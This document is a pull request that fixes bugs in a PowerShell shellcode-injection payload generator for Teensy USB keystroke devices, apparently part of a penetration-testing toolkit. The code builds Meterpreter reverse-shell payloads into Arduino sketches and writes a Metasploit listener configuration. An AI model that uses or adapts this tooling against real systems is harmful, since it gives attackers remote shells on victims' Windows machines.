### PR TITLE
Fixed multiple bugs in teensy powershell payloads.

### DIFF
--- a/src/teensy/powershell_shellcode.py
+++ b/src/teensy/powershell_shellcode.py
@@ -20,18 +20,19 @@ The powershell - shellcode injection leverages powershell to send a meterpreter 
 This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html)
 """)
 
-# define standard metasploit payload
-payload = "windows/meterpreter/reverse_tcp"
+payload = input('Enter the payload name [or Enter for windows/meterpreter/reverse_http]: ')
+if payload == '':
+    payload = 'windows/meterpreter/reverse_http'
 
 # create base metasploit payload to pass to powershell.prep
 with open(os.path.join(core.setdir + "metasploit.payload"), 'w') as filewrite:
     filewrite.write(payload)
 
-ipaddr = input("Enter the IP for the reverse: ")
-port = input("Enter the port for the reverse: ")
+ipaddr = input("Enter the IP of the LHOST: ")
+port = input("Enter the port for the LHOST: ")
 
 shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
-with open(os.path.join(core.setdir + 'x86.powershell', 'w')) as filewrite:
+with open(os.path.join(core.setdir + 'x86.powershell'), 'w') as filewrite:
     filewrite.write(shellcode)
 
 time.sleep(3)
@@ -47,11 +48,11 @@ with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
         reading_encoded = fileopen.read(data_read).rstrip()
         if not reading_encoded:
             break
-        output_variable += "const char RevShell_{0}[] PROGMEM = '{1}';\n".format(counter, reading_encoded)
+        output_variable += 'const char RevShell_{0}[] PROGMEM = {{"{1}"}};\n'.format(counter, reading_encoded)
         counter += 1
 
 rev_counter = 0
-output_variable += "const char exploit[] PROGMEM = {\n"
+output_variable += "const char * exploit[] PROGMEM = {\n"
 
 while rev_counter != counter:
     output_variable += "RevShell_{0}".format(rev_counter)
@@ -152,16 +153,16 @@ Keyboard.send_now();
 print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir + "reports/teensy.pde")))
 if not os.path.isdir(os.path.join(core.setdir + "reports")):
     os.makedirs(os.path.join(core.setdir + "reports"))
-with open(os.path.join(core.setdir + "/reports/teensy.pde", "w")) as filewrite:
+with open(os.path.join(core.setdir + "reports/teensy.pde"), "w") as filewrite:
     filewrite.write(teensy)
-choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
+choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no] ")
 if choice == "YES":
 
     # Open the IPADDR file
     if core.check_options("IPADDR=") != 0:
         ipaddr = core.check_options("IPADDR=")
     else:
-        ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
+        ipaddr = input("LHOST IP address to connect back on: ")
         core.update_options("IPADDR=" + ipaddr)
 
     if core.check_options("PORT=") != 0:
@@ -170,7 +171,7 @@ if choice == "YES":
     else:
         port = input("Enter the port to connect back on: ")
 
-    with open(os.path.join(core.setdir + "/metasploit.answers", "w")) as filewrite:
+    with open(os.path.join(core.setdir + "metasploit.answers"), "w") as filewrite:
         filewrite.write("use multi/handler\n"
                         "set payload {0}\n"
                         "set LHOST {1}\n"


### PR DESCRIPTION
Fixed multiple bugs:
1) Fixed opening of files for writing, old method was broken since the function was wrongly called (see lines 34,35 & 155,156)
2) OS path joins have extra / in the leading name of file, thus leading to errors while generating payloads (see lines:  173,174)
3) Teensy code doesn't compile and work on never versions of arduino studio and avr isp mk2 since how PROGMEM should be correctly handled (lines: 50,51 && 54,55)
4) Minor style fixes (removed duplicate : and so on) 
5) Added a prompt to specify the type of payload to prepare for teensy. 

That's it. 
Sincerely,
Tonimir